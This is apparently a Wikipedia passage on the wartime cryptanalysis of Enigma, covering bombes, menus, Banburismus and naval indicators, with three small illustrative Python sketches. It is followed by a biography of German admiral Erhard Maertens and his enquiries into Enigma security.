The demountable drums on the front of the bombe were wired identically to the connections made by Enigma's different rotors. Unlike them, however, the input and output contacts for the left-hand and the right-hand sides were separate, making 104 contacts between each drum and the rest of the machine.[127] This allowed a set of scramblers to be connected in series by means of 26-way cables. Electrical connections between the rotating drums' wiring and the rear plugboard were by means of metal brushes. When the bombe detected a scrambler position with no contradictions, it stopped, and the operator would note the position before restarting it.

Although Welchman had been given the task of studying Enigma traffic call signs and discriminants, he knew from Turing about the bombe design, and early in 1940, before the first pre-production bombe was delivered, he showed Turing an idea to increase its effectiveness.[128] It exploited the reciprocity of the plugboard connections to reduce considerably the number of scrambler settings that needed to be considered further. This became known as the diagonal board, and was subsequently incorporated to great effect in all the bombes.[22][129]

A cryptanalyst would prepare a crib for comparison with the ciphertext. This was a complicated and sophisticated task, which later took the Americans some time to master. As well as the crib, a decision had to be made as to which of the many possible wheel orders could be omitted. Turing's Banburismus was used in making this major economy. The cryptanalyst would then compile a menu, which specified the connections of the cables of the patch panels on the back of the machine, and a particular letter whose stecker partner was sought.
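A sketch of how the relationships in such a menu can be read off a crib: each position links a plaintext letter to a ciphertext letter, and the number of independent loops (closures) in the resulting graph measures the menu's strength. The crib and its alignment below are illustrative, not a historical intercept.

```python
crib       = "WETTERVORHERSAGE"            # a weather-forecast-style crib
ciphertext = "SNMKGGSTZZUGARLV"            # illustrative alignment, not historical

# Each scrambler position is an edge linking a crib letter to a cipher letter.
edges = [(p, c, i + 1) for i, (p, c) in enumerate(zip(crib, ciphertext))]
for p, c, i in edges:
    print(f"{p} --{i}-- {c}")

# Independent loops (closures) = edges - letters + connected components,
# counted here with a small union-find over the letter nodes.
letters = {x for p, c, _ in edges for x in (p, c)}
parent = {x: x for x in letters}
def find(x):
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x
components = len(letters)
for p, c, _ in edges:
    rp, rc = find(p), find(c)
    if rp != rc:
        parent[rp] = rc
        components -= 1
closures = len(edges) - len(letters) + components
print(f"{len(edges)}-letter menu with {closures} closure(s)")
```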
The menu reflected the relationships between the letters of the crib and those of the ciphertext. Some of these formed loops (or closures, as Turing called them), in a similar way to the cycles that the Poles had exploited.

The reciprocal nature of the plugboard meant that no letter could be connected to more than one other letter. When there was a contradiction, with two different letters apparently being stecker partners of the letter in the menu, the bombe would detect this and move on. If, however, this happened with a letter that was not part of the menu, a false stop could occur. In refining down the set of stops for further examination, the cryptanalyst would eliminate stops that contained such a contradiction. The other plugboard connections and the settings of the alphabet rings would then be worked out, before the scrambler positions at the possible true stops were tried out on Typex machines that had been adapted to mimic Enigmas. All the remaining stops would correctly decrypt the crib, but only the true stop would produce the correct plaintext of the whole message.[130]

To avoid wasting scarce bombe time on menus that were likely to yield an excessive number of false stops, Turing performed a lengthy probability analysis (without any electronic aids) of the estimated number of stops per rotor order. It became standard practice to use only menus that were estimated to produce no more than four stops per wheel order. This allowed an 8-letter crib for a 3-closure menu, an 11-letter crib for a 2-closure menu, and a 14-letter crib for a menu with only one closure. If there was no closure, at least 16 letters were required in the crib.[130] The longer the crib, however, the more likely it was that a turn-over of the middle rotor would have occurred.

The production model 3-rotor bombes contained 36 scramblers, arranged in three banks of twelve. Each bank was used for a different wheel order by fitting it with the drums that corresponded to the Enigma rotors being tested. The first bombe was named Victory and was delivered to Bletchley Park on 18 March 1940. The next one, which included the diagonal board, was delivered on 8 August 1940; it was referred to as a spider bombe and was named Agnus Dei, which soon became Agnes and then Aggie. The production of British bombes was relatively slow at first, with only five bombes in use in June 1941, 15 by the year's end,[131] 30 by September 1942, and 49 by January 1943,[132] but eventually 210 at the end of the war.

A refinement developed for use on messages from those networks that disallowed the plugboard (Stecker) connection of adjacent letters was the Consecutive Stecker Knock Out. This was fitted to 40 bombes and produced a useful reduction in false stops.[133]

Initially the bombes were operated by ex-BTM servicemen, but in March 1941 the first detachment of members of the Women's Royal Naval Service (known as Wrens) arrived at Bletchley Park to become bombe operators. By 1945 there were some 2,000 Wrens operating the bombes.[134] Because of the risk of bombing, relatively few of the bombes were located at Bletchley Park. The two largest outstations were at Eastcote (some 110 bombes and 800 Wrens) and Stanmore (some 50 bombes and 500 Wrens). There were also bombe outstations at Wavendon, Adstock, and Gayhurst. Communication with Bletchley Park was by teleprinter links.
When the German Navy started using 4-rotor Enigmas, about sixty 4-rotor bombes were produced at Letchworth, some with the assistance of the General Post Office.[135] The NCR-manufactured US Navy 4-rotor bombes were, however, very fast and the most successful. They were extensively used by Bletchley Park over teleprinter links (using the Combined Cipher Machine) to OP-20-G[136] for both 3-rotor and 4-rotor jobs.[137]

Although the German Army, SS, police, and railway all used Enigma with similar procedures, it was the Luftwaffe (Air Force) that was the first and most fruitful source of Ultra intelligence during the war. The messages were decrypted in Hut 6 at Bletchley Park and turned into intelligence reports in Hut 3.[138] The network code-named 'Red' at Bletchley Park was broken regularly and quickly from 22 May 1940 until the end of hostilities. Indeed, the Air Force section of Hut 3 expected the new day's Enigma settings to have been established in Hut 6 by breakfast time. The relative ease of solving this network's settings was a product of plentiful cribs and frequent German operating mistakes.[139] Luftwaffe chief Hermann Göring was known to use it for trivial communications, including informing squadron commanders to make sure the pilots he was going to decorate had been properly deloused. Such messages became known as "Göring funnies" to the staff at Bletchley Park.[citation needed]

Dilly Knox's last great cryptanalytical success, before his untimely death in February 1943, was the solving of the Abwehr Enigma in 1941. Intercepts of traffic which had an 8-letter indicator sequence before the usual 5-letter groups led to the suspicion that a 4-rotor machine was being used.[140] The assumption was correctly made that the indicator consisted of a 4-letter message key enciphered twice. The machine itself was similar to a Model G Enigma, with three conventional rotors, though it did not have a plugboard. The principal difference from the Model G was that it was equipped with a reflector that was advanced by the stepping mechanism once it had been set by hand to its starting position (in all other variants, the reflector was fixed). Collecting a set of enciphered message keys for a particular day allowed cycles (or boxes, as Knox called them) to be assembled, in a similar way to the method used by the Poles in the 1930s.[141]

Knox was able to derive, using his buttoning up procedure,[35] some of the wiring of the rotor that had been loaded in the fast position on that day. Progressively he was able to derive the wiring of all three rotors. Once that had been done, he was able to work out the wiring of the reflector.[141] Deriving the indicator setting for that day was achieved using Knox's time-consuming rodding procedure.[36] This involved a great deal of trial and error, imagination, and crossword puzzle-solving skills, but was helped by cillies.

The Abwehr was the intelligence and counter-espionage service of the German High Command. The spies that it placed in enemy countries used a lower-level cipher (which was broken by Oliver Strachey's section at Bletchley Park) for their transmissions. However, the messages were often then re-transmitted word for word on the Abwehr's internal Enigma networks, which gave the best possible crib for deciphering that day's indicator setting.
Interception and analysis of Abwehr transmissions led to the remarkable state of affairs that allowed MI5 to give a categorical assurance that all the German spies in Britain were controlled as double agents working for the Allies under the Double Cross System.[121]

In the summer of 1940, following the Franco-German armistice, most Army Enigma traffic was travelling by land lines rather than radio, and so was not available to Bletchley Park. The air Battle of Britain was crucial, so it was not surprising that the concentration of scarce resources was on Luftwaffe and Abwehr traffic. It was not until early in 1941 that the first breaks were made into German Army Enigma traffic, and it was the spring of 1942 before it was broken reliably, albeit often with some delay.[142] It is unclear whether the German Army Enigma operators made deciphering more difficult by making fewer operating mistakes.[143]

The German Navy used Enigma in the same way as the German Army and Air Force until 1 May 1937, when it changed to a substantially different system. This used the same sort of setting sheet but, importantly, it included the ground key for a period of two, sometimes three, days. The message setting was concealed in the indicator by selecting a trigram from a book (the Kenngruppenbuch, or K-Book) and performing a bigram substitution on it.[144] This defeated the Poles, although they suspected some sort of bigram substitution.

The procedure for the naval sending operator was as follows. First, they selected a trigram from the K-Book, say YLA. They then looked in the appropriate columns of the K-Book and selected another trigram, say YVT, and wrote the two trigrams, offset by one place, into the two rows of boxes at the top of the message form. They then filled in the two unused boxes (the "dots") with any letters. Finally, they looked up the four vertical pairs of letters in the bigram tables and wrote down the resultant pairs – say UB, LK, RS, and PW – which were transmitted as two four-letter groups at the start and end of the enciphered message. The receiving operator performed the converse procedure to obtain the message key for setting his Enigma rotors.
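The sketch below walks through the boxes-and-bigrams construction just described. The exact layout of the two trigrams in the form, the filler letters, and the bigram table itself are all stand-ins (the real daily tables were secret); only the shape of the procedure is taken from the account above.

```python
# Naval indicator construction: two K-Book trigrams written offset into a 2x4
# box, blanks filled arbitrarily, vertical pairs substituted through a bigram
# table. The table here is a random reciprocal pairing of all 676 bigrams --
# merely the right shape, not a real table.
import random

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

bigrams = [a + b for a in ALPHABET for b in ALPHABET]
rng = random.Random("bigram-table-demo")
rng.shuffle(bigrams)
BIGRAM = {}
for a, b in zip(bigrams[0::2], bigrams[1::2]):
    BIGRAM[a], BIGRAM[b] = b, a

def naval_indicator(trigram1, trigram2, fill="QX"):
    top    = fill[0] + trigram1        # assumed layout:  . Y L A  ->  Q Y L A
    bottom = trigram2 + fill[1]        #                  Y V T .  ->  Y V T X
    pairs  = [t + b for t, b in zip(top, bottom)]          # the vertical pairs
    eight  = "".join(BIGRAM[v] for v in pairs)             # bigram substitution
    return eight[:4], eight[4:]        # sent before and after the ciphertext

print(naval_indicator("YLA", "YVT"))
```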
As well as these Kriegsmarine procedures being much more secure than those of the German Army and Air Force, the German Navy Enigma introduced three more rotors (VI, VII, and VIII) early in 1940.[145] The choice of three rotors from eight meant that there were a total of 336 possible permutations of rotors and their positions.

Alan Turing decided to take responsibility for German naval Enigma because "no one else was doing anything about it and I could have it to myself".[146] He established Hut 8 with Peter Twinn and two "girls".[147] Turing used the indicators and message settings for traffic of 1–8 May 1937 that the Poles had worked out, and some very elegant deductions, to diagnose the complete indicator system. After the messages were deciphered, they were translated for transmission to the Admiralty in Hut 4.

The first break of wartime traffic came in December 1939, into signals that had been intercepted in November 1938, when only three rotors and six plugboard leads had been in use.[148] It used "Forty Weepy Weepy" cribs. A captured German Funkmaat ("radio operator") named Meyer had revealed that numerals were now spelt out as words. EINS, the German for "one", was present in about 90% of genuine German Navy messages. An EINS catalogue was compiled, consisting of the encipherment of EINS at all 105,456 rotor settings.[149] These were compared with the ciphertext, and when matches were found, about a quarter of them yielded the correct plaintext. Later this process was automated in Mr Freeborn's section using Hollerith equipment. When the ground key was known, this EINS-ing procedure could yield three bigrams for the tables that were then gradually assembled.[148]

Further progress required more information from German Enigma users. This was achieved through a succession of pinches – captures of Enigma parts and codebooks. The first of these was on 12 February 1940, when rotors VI and VII, whose wiring was at that time unknown, were captured from the German submarine U-33 by the minesweeper HMS Gleaner. On 26 April 1940, the Narvik-bound German patrol boat VP2623, disguised as a Dutch trawler named Polares, was captured by HMS Griffin. This yielded an instruction manual, codebook sheets, and a record of some transmissions, which provided complete cribs. This confirmed that Turing's deductions about the trigram/bigram process were correct and allowed a total of six days' messages to be broken, the last of these using the first of the bombes.[148] However, the numerous possible rotor sequences, together with a paucity of usable cribs, made the methods used against the Army and Air Force Enigma messages of very limited value with respect to the Navy messages.

At the end of 1939, Turing extended the clock method invented by the Polish cryptanalyst Jerzy Różycki. Turing's method became known as "Banburismus". Turing said that at that stage "I was not sure that it would work in practice, and was not in fact sure until some days had actually broken".[150] Banburismus used large cards printed in Banbury (hence the name) to discover correlations, and a statistical scoring system to determine likely rotor orders (Walzenlage) to be tried on the bombes. The practice conserved scarce bombe time and allowed more messages to be attacked. In practice, the 336 possible rotor orders could be reduced to perhaps 18 to be run on the bombes.[151] Knowledge of the bigrams was essential for Banburismus, and building up the tables took a long time. The lack of visible progress led Frank Birch, head of the Naval Section, to write on 21 August 1940 to Edward Travis, Deputy Director of Bletchley Park: "I'm worried about Naval Enigma. I've been worried for a long time, but haven't liked to say as much... Turing and Twinn are like people waiting for a miracle, without believing in miracles..."[152]

Schemes for capturing Enigma material were conceived, including, in September 1940, Operation Ruthless by Lieutenant Commander Ian Fleming (author of the James Bond novels). When this was cancelled, Birch told Fleming that "Turing and Twinn came to me like undertakers cheated of a nice corpse..."[153]

A major advance came through Operation Claymore, a commando raid on the Lofoten Islands on 4 March 1941. The German armed trawler Krebs was captured, including the complete Enigma keys for February, but no bigram tables or K-book. However, the material was sufficient to reconstruct the bigram tables by "EINS-ing", and by late March they were almost complete.[154] Banburismus then started to become extremely useful. Hut 8 was expanded and moved to 24-hour working, and a crib room was established.
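The statistical heart of Banburismus can be sketched without the punched cards: slide one ciphertext along another and count coincidences. Two messages enciphered "in depth" (at overlapping rotor positions) repeat letters noticeably more often than the roughly 1-in-26 rate expected of unrelated ciphertexts. The intercepts below are illustrative, contrived so that the true alignment (offset 0) stands out.

```python
def coincidences(a, b, offset):
    """Matching letters when b is slid 'offset' places along a."""
    pairs = list(zip(a[offset:], b) if offset >= 0 else zip(a, b[-offset:]))
    return sum(x == y for x, y in pairs), len(pairs)

msg1 = "MPXDJQRRLKWFDDTYEHRNBQPL"    # illustrative intercepts, not historical
msg2 = "TPQDKZRGLAWSDETYUHCWBRML"
for off in range(-2, 3):
    hits, overlap = coincidences(msg1, msg2, off)
    print(f"offset {off:+d}: {hits}/{overlap} coincidences")
```

Bletchley Park turned such counts into additive scores (measured in decibans) and accumulated them across many message pairs to rank the candidate rotor orders.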
The story of Banburismus for the next two years was one of improving methods, of struggling to get sufficient staff, and of a steady growth in the relative and absolute importance of cribbing, as the increasing numbers of bombes made the running of cribs ever faster.[155] Of value in this period were further "pinches", such as those from the German weather ships München and Lauenburg and the submarines U-110 and U-559. Despite the introduction of the 4-rotor Enigma for Atlantic U-boats, the analysis of traffic enciphered with the 3-rotor Enigma proved of immense value to the Allied navies. Banburismus was used until July 1943, when it became more efficient to use the many more bombes that had become available.

On 1 February 1942, the Enigma messages to and from Atlantic U-boats, which Bletchley Park called "Shark", became significantly different from the rest of the traffic, which they called "Dolphin".[156] This was because a new Enigma version had been brought into use. It was a development of the 3-rotor Enigma, with the reflector replaced by a thin rotor and a thin reflector. Eventually, there were two fourth-position rotors, called Beta and Gamma, and two thin reflectors, Bruno and Caesar, which could be used in any combination. These rotors were not advanced by the rotor to their right in the way that rotors I through VIII were.

The introduction of the fourth rotor did not catch Bletchley Park by surprise, because captured material dated January 1941 had made reference to its development as an adaptation of the 3-rotor machine, with the fourth rotor wheel to be a reflector wheel.[157] Indeed, because of operator errors, the wiring of the new fourth rotor had already been worked out. This major challenge could not be met by using existing methods and resources, for a number of reasons. It seemed, therefore, that effective, fast, 4-rotor bombes were the only way forward. This was an immense problem, and it gave a great deal of trouble. Work on a high-speed machine had been started by Wynn-Williams of the TRE late in 1941, and some nine months later Harold Keen of BTM started work independently. Early in 1942, Bletchley Park was a long way from possessing a high-speed machine of any sort.[159]

Eventually, after a long period of being unable to decipher U-boat messages, a source of cribs was found. This was the Kurzsignale (short signals), a code which the German Navy used to minimise the duration of transmissions, thereby reducing the risk of being located by high-frequency direction finding techniques. The messages were only 22 characters long and were used to report sightings of possible Allied targets.[160] A copy of the code book had been captured from U-110 on 9 May 1941. A similar coding system was used for weather reports from U-boats, the Wetterkurzschlüssel (Weather Short Code Book). A copy of this had been captured from U-559 on 29 or 30 October 1942.[161] These short signals had been used for deciphering 3-rotor Enigma messages, and it was discovered that the new rotor had a neutral position at which it, and its matching reflector, behaved just like a 3-rotor Enigma reflector. This allowed messages enciphered at this neutral position to be deciphered by a 3-rotor machine, and hence deciphered by a standard bombe.
Deciphered Short Signals provided good material for bombe menus for Shark.[162] Regular deciphering of U-boat traffic restarted in December 1942.[163]

In 1940 Dilly Knox wanted to establish whether the Italian Navy were still using the same system that he had cracked during the Spanish Civil War; he instructed his assistants to use rodding to see whether the crib PERX (per being Italian for "for", and X being used to indicate a space between words) worked for the first part of the message. After three months there was no success, but Mavis Lever, a 19-year-old student, found that rodding produced PERS for the first four letters of one message. She then (against orders) tried beyond this and obtained PERSONALE (Italian for "personal"). This confirmed that the Italians were indeed using the same machines and procedures.[36]

The subsequent breaking of Italian naval Enigma ciphers led to substantial Allied successes. The cipher-breaking was disguised by sending a reconnaissance aircraft to the known location of a warship before attacking it, so that the Italians assumed that this was how they had been discovered. The Royal Navy's victory at the Battle of Cape Matapan in March 1941 was considerably helped by Ultra intelligence obtained from Italian naval Enigma signals.[164]

Unlike the situation at Bletchley Park, the United States armed services did not share a combined cryptanalytical service. Before the US joined the war, there was collaboration with Britain, albeit with a considerable amount of caution on Britain's side, because of the extreme importance of Germany and her allies not learning that its codes were being broken. Despite some worthwhile collaboration among the cryptanalysts, their superiors took some time to achieve a trusting relationship in which both British and American bombes were used to mutual benefit.

In February 1941, Captain Abraham Sinkov and Lieutenant Leo Rosen of the US Army, and Lieutenants Robert Weeks and Prescott Currier of the US Navy, arrived at Bletchley Park, bringing, among other things, a replica of the "Purple" cipher machine for Bletchley Park's Japanese section in Hut 7.[165] The four returned to America after ten weeks, with a naval radio direction-finding unit and many documents,[166] including a "paper Enigma".[167]

The main American response to the 4-rotor Enigma was the US Navy bombe, which was manufactured in much less constrained facilities than were available in wartime Britain. Colonel John Tiltman, who later became Deputy Director at Bletchley Park, visited the US Navy cryptanalysis office (OP-20-G) in April 1942 and recognised America's vital interest in deciphering U-boat traffic. The urgent need, doubts about the British engineering workload, and slow progress prompted the US to start investigating designs for a Navy bombe, based on the full blueprints and wiring diagrams received by US Navy Lieutenants Robert Ely and Joseph Eachus at Bletchley Park in July 1942.[168][169] Funding for a full, $2 million, Navy development effort was requested on 3 September 1942 and approved the following day.

Commander Edward Travis, Deputy Director, and Frank Birch, Head of the German Naval Section, travelled from Bletchley Park to Washington in September 1942.
With Carl Frederick Holden, US Director of Naval Communications, they established, on 2 October 1942, a UK–US accord which may have "a stronger claim than BRUSA to being the forerunner of the UKUSA Agreement", being the first agreement "to establish the special Sigint relationship between the two countries", and "it set the pattern for UKUSA, in that the United States was very much the senior partner in the alliance".[170] It established a relationship of "full collaboration" between Bletchley Park and OP-20-G.[171]

An all-electronic solution to the problem of a fast bombe was considered,[172] but rejected for pragmatic reasons, and a contract was let with the National Cash Register Corporation (NCR) in Dayton, Ohio. This established the United States Naval Computing Machine Laboratory. Engineering development was led by NCR's Joseph Desch, a brilliant inventor and engineer who had already been working on electronic counting devices.[173]

Alan Turing, who had written a memorandum to OP-20-G (probably in 1941),[174] was seconded to the British Joint Staff Mission in Washington in December 1942, because of his exceptionally wide knowledge of the bombes and the methods of their use. He was asked to look at the bombes that were being built by NCR, and at the security of certain speech cipher equipment under development at Bell Labs.[175] He visited OP-20-G, and went to NCR in Dayton on 21 December. He was able to show that it was not necessary to build 336 bombes, one for each possible rotor order, by utilising techniques such as Banburismus.[176] The initial order was scaled down to 96 machines.

The US Navy bombes used drums for the Enigma rotors in much the same way as the British bombes, but were very much faster. The first machine was completed and tested on 3 May 1943. Soon these bombes were more available than the British bombes at Bletchley Park and its outstations, and as a consequence they were put to use for Hut 6 as well as Hut 8 work.[177] A total of 121 Navy bombes were produced.[178]

The US Army also produced a version of a bombe. It was physically very different from the British and US Navy bombes. A contract was signed with Bell Labs on 30 September 1942.[179] The machine was designed to analyse 3-rotor, not 4-rotor, traffic. It did not use drums to represent the Enigma rotors, using instead telephone-type relays. It could, however, handle one problem that the bombes with drums could not.[177][178] The set of ten bombes consisted of a total of 144 Enigma-equivalents, each mounted on a rack approximately 7 feet (2.1 m) long, 8 feet (2.4 m) high, and 6 inches (150 mm) wide. There were 12 control stations, which could allocate any of the Enigma-equivalents into the desired configuration by means of plugboards. Rotor order changes did not require the mechanical process of changing drums, but were achieved in about half a minute by means of push buttons.[180] A 3-rotor run took about 10 minutes.[178]

The German Navy was concerned that Enigma could be compromised. It printed key schedules in water-soluble inks so that they could not be salvaged.[181] It policed its operators and disciplined them when they made errors that could compromise the cipher.[182] The Navy minimised its exposure: for example, ships that might be captured or run aground did not carry Enigma machines.
When ships were lost in circumstances where the enemy might salvage them, the Germans investigated.[183] After investigating some losses in 1940, Germany changed some message indicators.[184]

In April 1940, the British sank eight German destroyers in Norway. The Germans concluded that it was unlikely that the British were reading Enigma.[181]

In May 1941, the British deciphered some messages that gave the location of some supply ships for the battleship Bismarck and the cruiser Prinz Eugen. As part of the Operation Rheinübung commerce raid, the Germans had assigned five tankers, two supply ships, and two scouts to support the warships. After the Bismarck was sunk, the British directed their forces to sink the supporting ships Belchen, Esso Hamburg, Egerland, and some others. The Admiralty specifically did not target the tanker Gedania and the scout Gonzenheim, figuring that sinking so many ships within one week would indicate to Germany that Britain was reading Enigma. However, by chance, British forces found those two ships and sank them.[185] The Germans investigated, but concluded that Enigma had not been breached, by either seizure or brute-force cryptanalysis. Nevertheless, the Germans took some steps to make Enigma more secure. Grid locations (an encoded latitude and longitude) were further disguised using digraph tables and a numeric offset.[186] The U-boats were given their own network, Triton, to minimise the chance of a cryptanalytic attack.

In August 1941, the British captured U-570. The Germans concluded that the crew would have destroyed the important documents, so the cipher was safe. Even if the British had captured the materials intact and could read Enigma, they would lose that ability when the keys changed on 1 November.[187]

Although Germany realised that convoys were avoiding its wolfpacks, it did not attribute that ability to the reading of Enigma traffic. Instead, Dönitz thought that Britain was using radar and direction finding.[187] The Kriegsmarine continued to increase the number of networks to avoid superimposition attacks on Enigma; at the beginning of 1943, it had 13 networks.[188]

The Kriegsmarine also improved the Enigma itself: on 1 February 1942, it started using the four-rotor Enigma.[189] The improved security meant that convoys no longer had as much information about the whereabouts of wolfpacks, and were therefore less able to avoid areas where they would be attacked. The increased success of wolfpack attacks following the strengthening of the encryption might have given the Germans a clue that the previous Enigma codes had been broken, but that recognition did not happen, because other things changed at the same time: the United States had entered the war, and Dönitz had sent U-boats to raid the US East Coast, where there were many easy targets.[190]

In early 1943, Dönitz was worried that the Allies were reading Enigma. Germany's own cryptanalysis of Allied communications showed surprising accuracy in the Allied estimates of wolfpack sizes. It was concluded, however, that Allied direction finding was the source. The Germans had also recovered a cavity magnetron, used to generate radar waves, from a downed British bomber, and concluded that the Enigma was secure. The Germans were still suspicious, though, so each submarine got its own key net in June 1944.[191]

By 1945, almost all German Enigma traffic (from the Wehrmacht services – the Heer, Kriegsmarine, and Luftwaffe – and from German intelligence and security services such as the Abwehr and SD)
could be decrypted within a day or two, yet the Germans remained confident of its security.[192] They openly discussed their plans and movements, handing the Allies huge amounts of information, not all of which was used effectively. For example, Rommel's actions at Kasserine Pass were clearly foreshadowed in decrypted Enigma traffic, but the Americans did not properly appreciate the information.[citation needed]

After the war, Allied TICOM project teams found and detained a considerable number of German cryptographic personnel.[193] Among the things learned was that German cryptographers, at least, understood very well that Enigma messages might be read; they knew Enigma was not unbreakable.[4] They just found it impossible to imagine anyone going to the immense effort required.[194] When Abwehr personnel who had worked on Fish cryptography and Russian traffic were interned at Rosenheim around May 1945, they were not at all surprised that Enigma had been broken,[citation needed] only that someone had mustered all the resources in time to actually do it. Admiral Dönitz had been advised that a cryptanalytic attack was the least likely of all security problems.[citation needed]

Modern computers can be used to solve Enigma, using a variety of techniques.[195] There have been projects to decrypt some remaining messages using distributed computing.[196] On 8 May 2020, to mark the 75th anniversary of VE Day, GCHQ released the last Enigma message to be decrypted by codebreakers at Bletchley Park. The message was sent at 07:35 on 7 May 1945 by a German radio operator in Cuxhaven, and read: "British troops entered Cuxhaven at 14:00 on 6 May 1945 – all radio broadcast will cease with immediate effect – I wish you all again the best of luck". It was immediately followed by another message: "Closing down forever – all the best – goodbye".[197]

The break into Enigma was kept secret until 1974. The machines remained in use well into the 1960s in Switzerland, Norway (Norenigma), and some British colonies.
https://en.wikipedia.org/wiki/Cryptanalysis_of_the_Enigma
Erhard Maertens or Eberhard Maertens (26 February 1891 – 5 May 1945)[1][2] was a German Vizeadmiral of the Kriegsmarine during World War II. From 16 June 1941 to 5 May 1943, he was Chief of the Office of Naval Intelligence, Naval War Command (German: Marinekommandoamt) in the Oberkommando der Marine. Maertens was known for underestimating British intelligence and, specifically, for overrating the security of the Naval Enigma cipher machine. In 1941, he held a naval enquiry into the strength of Naval Enigma security after the capture of the U-boat U-570, and attributed all the suspicious U-boat losses of the time to British Huff-Duff. In a second enquiry, ordered by the Commander-in-Chief of the Navy (German: Oberbefehlshaber der Kriegsmarine) Karl Dönitz in May 1943, he investigated a number of areas and in the end again exculpated Enigma security, incorrectly blaming British 9.7 cm centimetric radar for the massive losses of U-boats by mid-1943.[3] On 1 April 1910, Maertens joined the Imperial German Navy as a Seekadett and had basic training on the heavy cruiser SMS Hansa until 31 March 1911. He was promoted to an officer candidate rank (German: Fähnrich zur See) and sent to the Naval Academy Mürwik for naval training until 30 September 1912.[2] In September 1913, he was promoted to Leutnant zur See after completing his training. From 1 October 1912 to 7 October 1915, Maertens was posted to the liner Hessen to learn the sailing characteristics of large ships and their movements. On 8 September 1915, Maertens started submarine and radio training, and was later posted as a watch officer on the U-boat U-3 on 17 October 1915. He completed his submarine training on 26 February 1916, was promoted on 22 March 1916 to Oberleutnant zur See, and was posted to the U-boat U-47 as watch officer the day after.[2] He was subsequently posted to U-48, in the same post, until 24 November 1917, when U-48 ran aground on Goodwin Sands, where the submarine was fired on by HMS Gipsy and was scuttled and abandoned. Maertens and 17 other submariners of U-48 were taken prisoner[4] and held in captivity until 5 November 1919.[2] After being released, Maertens was subordinated to the battleship SMS Schwaben for a month as a watch officer. In early 1920, he was posted to Baltiysk for two months as a naval signals officer. On 1 January 1921, he was promoted to Kapitänleutnant. On 1 March 1921, Maertens was ordered to act as leader of the service office at Königsberg. On 7 April 1921, he was subordinated as adjutant and naval signals officer to the commander of the naval base at Świnoujście.[2] In October 1921, he was posted to Coastal Defence Battalion I as company leader, where he stayed until March 1925. On 17 March 1925, he was subordinated to the commander of the Torpedo and Mining Academy in Kiel, where he stayed until 14 August 1928. From 15 August 1928 to 30 September 1934, he was a department head of the Naval Shipyard for the Naval Command (German: Reichsmarine). In October 1934, Maertens was promoted to Fregattenkapitän, the senior middle rank of the Kriegsmarine. From 1934 to 1936, he was Commander of the Naval Academy Mürwik. He was then posted to the Bureau of Inspection of the Torpedo Service in Kiel as Director of Staff until 30 September 1937.
During the same period he was ordered to be Acting Inspector of Torpedo Affairs until 17 April 1937.[2] From October 1937 to April 1939, Maertens was Director of Staff of Inspections in Naval Signals, and was ordered again, on a temporary basis, to be Acting Inspector of Naval Signals from May 1938 to March 1939. He then became leader and subsequently Commander of the Communication Test Institute of the OKM from 28 April 1939 to 18 November 1939. He was then promoted to Director of Technical Signals Affairs in the Naval Weapons Office in the Oberkommando der Marine from 19 November 1939 to 15 June 1941.[2] On 1 July 1940, Maertens was promoted to Konteradmiral, and on 1 September 1942 to Vizeadmiral. From 19 June 1941 to 5 May 1943, he was Group Director of the Naval Intelligence Service (German: Seekriegsleitung III) of the Oberkommando der Marine (OKM/4 SKL III).[2] From 6 May 1943 to June 1943, Maertens was Acting Shipyard Director of the Kriegsmarine shipyard in Kiel. From 28 November 1944 to 28 February 1945, he was placed at the disposal of Oskar Kummetz, who was the Baltic Sea regional commander.[2] Maertens retired on 28 February 1945. Maertens was a career navy signals officer who was promoted to Director of the Naval Intelligence Command (German: Marinenachrichtendienst) in June 1941, at a time when the B-Dienst, the naval signals intelligence department of the Kriegsmarine, was at its most active. In May 1941, Captain Ludwig Stummel, Group Director of the Naval Warfare department, was a subordinate of Maertens. After the sinking of eight destroyers and the U-boat U-13 in April–May 1940, Stummel started a probe into the sinkings. Vice Admiral Karl Dönitz requested confirmation as to whether the loss of the submarine had caused the observed change in movement of a targeted convoy, and specifically asked for assurances of the security of Enigma Key M.[5] Konteradmiral Erhard Maertens, coming to the aid of his subordinate, stated that four separate events would all have to occur together for the cipher to be compromised.[6][7] Maertens believed that each of these events, taken alone, was unlikely, and that in combination they were impossible. A bombing raid was ordered in an attempt to ensure that U-13 and all associated Key M (i.e. Enigma cipher machine) infrastructure were destroyed.[7] The crew of one of the planes noticed that the site of U-13 was marked by buoys, indicating, perhaps, that the submarine had not been salvaged. This was stated in the official report. In that case, the British Admiralty had not recovered any Key M material or machinery. Maertens was ordered to lead a formal enquiry into the "control and investigation of own processes" following the August 1941 capture of the U-boat U-570 (later renamed HMS Graph by the Royal Navy), a potential leak of German secure communication details. This was considered by Naval Intelligence to be a progression and continuation of previous investigations and probes, a process that had existed since the Naval Enigma cipher machine was introduced.[5] One of these investigations had been conducted by Kurt Fricke, Chief of Naval War Command, into another incident: the sinking of the German battleship Bismarck on 27 May 1941 had caused great consternation in the Kriegsmarine, and the investigation resulted in a number of changes to Enigma cipher processes. On 18 October 1941, Maertens completed his analysis of the security consequences, stating in his report that "a current reading of our messages is not possible."
On the next page, however, he conceded that if the enemy had found the Enigma cipher machine untouched, with all key documents, then a current reading was possible. The U-boats routinely carried between two and three months' worth of daily key settings, so the enemy could have used U-570's material to read enciphered messages until November 1941. If these documents had fallen into enemy hands, the result, in Maertens's words, would be "without doubt a weakening of the security of our cipher." He concluded, however, that the crew would probably have had enough time to drench the documents, making their water-soluble ink unreadable. In the end, he left the impression that the British were not solving Enigma messages.[8] In fact, once U-570 was captured, a search was conducted, and useful papers were found to have escaped destruction by the departing German crew. Copies of encrypted signals and their corresponding plain-language German texts were discovered by the British. The U-570 papers included all supporting documentation for the Naval Key M ciphers. Maertens's verdict in his final report had some very worrying conclusions: We have to accept that the U-570 might have been captured by the enemy without anything having been destroyed. In these circumstances it cannot be ruled out that... a large amount of cipher documents are in enemy's hands. If this is true, the security of our enciphering procedure has been weakened... Our cipher will have been compromised if, as well as the enemy capturing the codebooks, our officers, who are now POWs, have told the enemy the keyword, which since June 1941 has been given verbally to the U-boat commander so that he could alter the printed list of Enigma settings. If that has occurred, then we have to accept that our radio messages are being read by the enemy... The same would be true if the keyword had been written down in breach of regulations, and the codebooks and the keyword had fallen into enemy hands, or if, for example, the settings arrived at by the keyword order were written on the original settings list. If this happened, the enemy could work out the meaning of the keyword.[9] The action in Tarrafal Bay worried Dönitz, and another investigation was launched by Maertens. He noted that the U-boat U-111 had detailed a meeting point in a message transmitted on 23 September 1941, four days before the ambush. 